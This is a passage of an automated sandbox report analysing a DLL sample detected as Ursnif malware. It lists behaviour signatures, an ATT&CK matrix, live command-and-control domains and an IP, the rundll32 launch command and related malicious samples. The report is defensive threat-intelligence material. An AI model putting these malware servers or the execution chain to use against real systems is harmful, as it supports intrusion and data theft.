          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\System32\loaddll64.exe TID: 1568Thread sleep time: -120000s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 2516Thread sleep time: -60000s >= -30000sJump to behavior
          Source: C:\Windows\System32\regsvr32.exe TID: 2768Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\System32\regsvr32.exeLast function: Thread delayed
          Source: C:\Windows\System32\rundll32.exeAPI coverage: 3.7 %
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130EFB70 FindFirstFileExA,0_2_00007FFC130EFB70
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130EFB70 FindFirstFileExA,3_2_00007FFC130EFB70
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130EFB70 FindFirstFileExA,8_2_00007FFC130EFB70
          Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
          Source: C:\Windows\System32\loaddll64.exeAPI call chain: ExitProcess graph end nodegraph_0-10341
          Source: C:\Windows\System32\loaddll64.exeAPI call chain: ExitProcess graph end nodegraph_0-10597
          Source: C:\Windows\System32\loaddll64.exeAPI call chain: ExitProcess graph end nodegraph_0-10336
          Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
          Source: C:\Windows\System32\rundll32.exeAPI call chain: ExitProcess graph end node
          Source: WerFault.exe, 0000000D.00000003.376776710.000001EA8F378000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.376906678.000001EA8F37C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqCWW
          Source: regsvr32.exe, 00000003.00000002.641033491.000000000078E000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596506826.000000000078D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW0
          Source: WerFault.exe, 0000000D.00000003.378482368.000001EA8F388000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000002.379511936.000001EA8F368000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
          Source: regsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.401143685.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000002.379494368.000001EA8F35C000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 0000000D.00000003.378323908.000001EA8F35C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: regsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.401143685.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWa[g6
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130EBC0C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC130EBC0C
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130FB9B0 LoadLibraryA,GetProcAddress,0_2_00007FFC130FB9B0
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130E2380 GetProcessHeap,HeapAlloc,CreateFileA,TryEnterCriticalSection,0_2_00007FFC130E2380
          Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6136 -s 304Jump to behavior
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130EBC0C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC130EBC0C
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130EE374 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FFC130EE374
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130F6DA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FFC130F6DA4
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130EBC0C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFC130EBC0C
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130EE374 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00007FFC130EE374
          Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00007FFC130F6DA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00007FFC130F6DA4
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130EBC0C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFC130EBC0C
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130EE374 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFC130EE374
          Source: C:\Windows\System32\rundll32.exeCode function: 8_2_00007FFC130F6DA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FFC130F6DA4

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 185.250.148.35 443Jump to behavior
          Source: C:\Windows\System32\regsvr32.exeDomain query: gigimas.xyz
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\pzG0rkIchr.dll",#1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6136 -s 304Jump to behavior
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130F65F0 cpuid 0_2_00007FFC130F65F0
          Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130FED60 CreateNamedPipeA,0_2_00007FFC130FED60
          Source: C:\Windows\System32\loaddll64.exeCode function: 0_2_00007FFC130EBB08 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FFC130EBB08

          Stealing of Sensitive Information

          barindex
          Yara detected Ursnif
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 1556, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2356, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5264, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Yara detected Ursnif
          Source: Yara matchFile source: Process Memory Space: loaddll64.exe PID: 1556, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 2356, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5268, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5264, type: MEMORYSTR

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts1
          Native API          		1
          DLL Side-Loading          		112
          Process Injection          		1
          Disable or Modify Tools          		OS Credential Dumping1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		Exfiltration Over Other Network Medium12
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading          		21
          Virtualization/Sandbox Evasion          		LSASS Memory31
          Security Software Discovery          		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
          Non-Application Layer Protocol          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)112
          Process Injection          		Security Account Manager21
          Virtualization/Sandbox Evasion          		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
          Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
          Regsvr32          		NTDS1
          Remote System Discovery          		Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
          Rundll32          		LSA Secrets1
          File and Directory Discovery          		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.common1
          DLL Side-Loading          		Cached Domain Credentials13
          System Information Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 752975 Sample: pzG0rkIchr.dll Startdate: 24/11/2022 Architecture: WINDOWS Score: 92 31 Snort IDS alert for network traffic 2->31 33 Multi AV Scanner detection for domain / URL 2->33 35 Antivirus detection for URL or domain 2->35 37 2 other signatures 2->37 7 loaddll64.exe 1 2->7         started        process3 process4 9 regsvr32.exe 7->9         started        13 rundll32.exe 7->13         started        15 cmd.exe 1 7->15         started        17 3 other processes 7->17 dnsIp5 27 gigimas.xyz 185.250.148.35, 443, 49713, 49714 FIRSTDC-ASRU Russian Federation 9->27 29 192.168.2.1 unknown unknown 9->29 39 System process connects to network (likely due to code injection or exploit) 9->39 41 Performs DNS queries to domains with low reputation 9->41 19 WerFault.exe 9 13->19         started        21 WerFault.exe 13->21         started        23 rundll32.exe 15->23         started        25 WerFault.exe 21 9 17->25         started        signatures6 process7

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          pzG0rkIchr.dll57%VirustotalBrowse
          pzG0rkIchr.dll73%ReversingLabsWin64.Trojan.Tnega

          Dropped Files

          No Antivirus matches

          Unpacked PE Files

          No Antivirus matches

          Domains

          SourceDetectionScannerLabelLink
          gigimas.xyz14%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          https://gigimas.xyz0%Avira URL Cloudsafe
          https://gigimas.xyz11%VirustotalBrowse
          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
          https://sectigo.com/CPS00%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%URL Reputationsafe
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%URL Reputationsafe
          http://ocsp.sectigo.com00%URL Reputationsafe
          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%URL Reputationsafe
          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%URL Reputationsafe
          https://gigimas.xyz/index.html9Pu/Jl0%Avira URL Cloudsafe
          https://gigimas.xyz/index.html5F0%Avira URL Cloudsafe
          https://gigimas.xyz/index.html0%Avira URL Cloudsafe
          https://gigimas.xyz/index.htmlT0%Avira URL Cloudsafe
          https://http://Mozilla/5.00%Avira URL Cloudsafe
          https://gigimas.xyzhttps://reaso.xyz0%Avira URL Cloudsafe
          https://gigimas.xyz/index.htmlm0%Avira URL Cloudsafe
          https://gigimas.xyz:443/index.htmlY_0%Avira URL Cloudsafe
          https://gigimas.xyz:443/index.html0%Avira URL Cloudsafe
          https://gigimas.xyz/0%Avira URL Cloudsafe
          https://reaso.xyz100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          gigimas.xyz
          		185.250.148.35
          		truetrueunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          https://gigimas.xyzloaddll64.exe, 00000000.00000003.631018067.0000020164340000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641543041.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357258070.0000017B374A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357488590.00000201A4290000.00000004.00000020.00020000.00000000.sdmptrue
          • 11%, Virustotal, Browse
          • Avira URL Cloud: safe
          		unknown
          http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpzG0rkIchr.dllfalse
          • URL Reputation: safe
          		unknown
          https://sectigo.com/CPS0pzG0rkIchr.dllfalse
          • URL Reputation: safe
          		unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0ypzG0rkIchr.dllfalse
          • URL Reputation: safe
          		unknown
          http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0pzG0rkIchr.dllfalse
          • URL Reputation: safe
          		unknown
          http://ocsp.sectigo.com0pzG0rkIchr.dllfalse
          • URL Reputation: safe
          		unknown
          https://gigimas.xyz/index.html9Pu/Jlregsvr32.exe, 00000003.00000003.466312748.00000000007DD000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://gigimas.xyz/index.html5Fregsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://http://Mozilla/5.0loaddll64.exe, 00000000.00000003.631032238.0000020164342000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641554871.00000000020E2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357262173.0000017B374A2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357492545.00000201A4292000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          		low
          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#pzG0rkIchr.dllfalse
          • URL Reputation: safe
          		unknown
          https://gigimas.xyz/index.htmlregsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596506826.000000000078D000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://gigimas.xyz/index.htmlTregsvr32.exe, 00000003.00000002.641214444.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596466270.00000000007C6000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531265696.00000000007C6000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#pzG0rkIchr.dllfalse
          • URL Reputation: safe
          		unknown
          https://gigimas.xyzhttps://reaso.xyzregsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://gigimas.xyz/index.htmlmregsvr32.exe, 00000003.00000002.641004710.0000000000785000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#pzG0rkIchr.dllfalse
          • URL Reputation: safe
          		unknown
          https://gigimas.xyz/regsvr32.exe, 00000003.00000003.466330233.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.595788178.0000000000815000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641484903.0000000000813000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.596407001.0000000000813000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000003.466249755.00000000007A9000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://gigimas.xyz:443/index.htmlY_regsvr32.exe, 00000003.00000003.596495160.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641359278.00000000007E8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown
          https://reaso.xyzregsvr32.exe, 00000003.00000002.641761210.00000000021BD000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000003.00000002.641543041.00000000020E0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.357258070.0000017B374A0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.357488590.00000201A4290000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          https://gigimas.xyz:443/index.htmlregsvr32.exe, 00000003.00000003.531293534.00000000007E8000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          		unknown

          World Map of Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public IPs

          IPDomainCountryFlagASNASN NameMalicious
          185.250.148.35
          		gigimas.xyzRussian Federation
          		48430FIRSTDC-ASRUtrue

          Private

          IP
          192.168.2.1

          General Information

          Joe Sandbox Version:36.0.0 Rainbow Opal
          Analysis ID:752975
          Start date and time:2022-11-24 05:29:36 +01:00
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 9m 27s
          Hypervisor based Inspection enabled:false
          Report type:full
          Sample file name:pzG0rkIchr.dll
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:25
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal92.troj.evad.winDLL@19/8@4/2
          EGA Information:
          • Successful, ratio: 100%
          HDC Information:
          • Successful, ratio: 78% (good quality ratio 69.5%)
          • Quality average: 59.8%
          • Quality standard deviation: 32.6%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 90
          • Number of non-executed functions: 104
          Cookbook Comments:
          • Found application associated with file extension: .dll
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

          Warnings

          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
          • Excluded IPs from analysis (whitelisted): 20.42.65.92
          • Excluded domains from analysis (whitelisted): fs.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, watson.telemetry.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size getting too big, too many NtProtectVirtualMemory calls found.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          185.250.148.354R5qvHtzCd.dllGet hashmaliciousBrowse
            DlLOgYHCSH.dllGet hashmaliciousBrowse
              igzTVM2e0E.dllGet hashmaliciousBrowse
                pzG0rkIchr.dllGet hashmaliciousBrowse
                  R1yf6aNGRb.dllGet hashmaliciousBrowse
                    4R5qvHtzCd.dllGet hashmaliciousBrowse
                      5120184.dllGet hashmaliciousBrowse
                        5130000.dllGet hashmaliciousBrowse
                          Shrjdjykdhjt.dllGet hashmaliciousBrowse
                            Shrjdjykdhjt.dllGet hashmaliciousBrowse

                              Domains

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              gigimas.xyz4R5qvHtzCd.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              DlLOgYHCSH.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              igzTVM2e0E.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              pzG0rkIchr.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              R1yf6aNGRb.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              4R5qvHtzCd.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              5120184.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              5130000.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              Shrjdjykdhjt.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              Shrjdjykdhjt.dllGet hashmaliciousBrowse
                              • 185.250.148.35

                              ASNs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              FIRSTDC-ASRU4R5qvHtzCd.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              DlLOgYHCSH.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              igzTVM2e0E.dllGet hashmaliciousBrowse
                              • 45.67.34.172
                              pzG0rkIchr.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              R1yf6aNGRb.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              4R5qvHtzCd.dllGet hashmaliciousBrowse
                              • 185.250.148.35
                              Setup.exeGet hashmaliciousBrowse
                              • 185.231.205.200
                              Cracked.exeGet hashmaliciousBrowse
                              • 185.231.205.200
                              file.exeGet hashmaliciousBrowse
                              • 45.67.35.17
                              5mpQrt0teP.exeGet hashmaliciousBrowse
                              • 93.185.166.95
                              vZu7WohZKt.exeGet hashmaliciousBrowse
                              • 93.185.166.200
                              vZu7WohZKt.exeGet hashmaliciousBrowse
                              • 93.185.166.200
                              221019-nwad3afdb7_pw_infected.zipGet hashmaliciousBrowse
                              • 5.252.23.34
                              hibUp3UOKx.exeGet hashmaliciousBrowse
                              • 45.67.35.251
                              kiFWEWjTPk.exeGet hashmaliciousBrowse
                              • 37.44.208.80
                              xx.dllGet hashmaliciousBrowse
                              • 45.67.34.245
                              xx.dllGet hashmaliciousBrowse
                              • 45.67.34.245
                              QfeGQnP2s8.exeGet hashmaliciousBrowse
                              • 185.250.149.159
                              cXRM6Pj5DY.exeGet hashmaliciousBrowse
                              • 5.252.23.112
                              AB2B84A49E97AC78BE55918EB9B1E91A69FC237BCD212.exeGet hashmaliciousBrowse
                              • 5.252.23.112

                              JA3 Fingerprints

                              No context

                              Dropped Files

                              No context

                              Created / dropped Files

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_pzG_206411b7d18c8b51ef308e99261d801f59953bc0_4f0e5919_15ebd55f\Report.wer

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.7599332074807373
                              Encrypted:false
                              SSDEEP:96:YImFlZZFiWpJPnyijs55P7HfgpXIQcQdc6/RcENcw3VXaXz+HbHgSQgJPbJIDV9+:nm3FiYJKgHz9XpjEI/u7sGOS274ltC
                              MD5:4D7AD4D16E977190A93A4217F65D5552
                              SHA1:4C633364E29B27CC5520425ACF90D722D0615F55
                              SHA-256:538A208795EC006468C02E86FF3F447417F354986183D6CF0BB1202C6DCD6B33
                              SHA-512:E9A45DA51EF7DB62A595D2FA006C1FD4E4E2B307822E7AED13001CA6517DBFDA7B4D9ECB4B77B11784C4F5ADA883C7DB69F9E028D3C6D9B95023BD486973B102
                              Malicious:false
                              Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.1.3.7.7.0.2.8.9.3.4.1.7.5.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.1.3.7.7.0.2.9.0.4.3.5.3.8.3.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.4.5.a.7.c.8.e.-.c.e.f.3.-.4.d.d.a.-.9.e.b.5.-.3.1.5.6.4.a.f.2.e.c.5.c.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.e.c.2.f.5.9.5.-.e.a.9.0.-.4.6.7.7.-.b.6.a.3.-.f.0.b.e.2.d.9.9.5.5.b.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e._.p.z.G.0.r.k.I.c.h.r...d.l.l.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.7.f.8.-.0.0.0.1.-.0.0.1.f.-.2.0.5.2.-.d.3.f.1.0.8.0.0.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.2.f.3.4.c.c.f.d.d.8.1.4.1.a.e.e.e.2.e.8.9.f.f.b.0.7.0.c.e.2.3.9.c.7.d.0.0.7.

                              C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_pzG_738eef979a666465c6051ddd5fef4b7e70c91a_4f0e5919_15905d59\Report.wer

                              Download File
                              Process:C:\Windows\System32\WerFault.exe
                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):65536
                              Entropy (8bit):0.7588806812185113
                              Encrypted:false
                              SSDEEP:96:EtaFiDJPnycjs551DW9SspXIQcQQGc6bcEKcw3UUeXaXz+HbHgSQgJPbph88WpOX:sciDJKWH1fQ4Ucjpe/u7sGOS274lt9
                              MD5:970AE762D984AB0562EF2DDEE4F7F71C
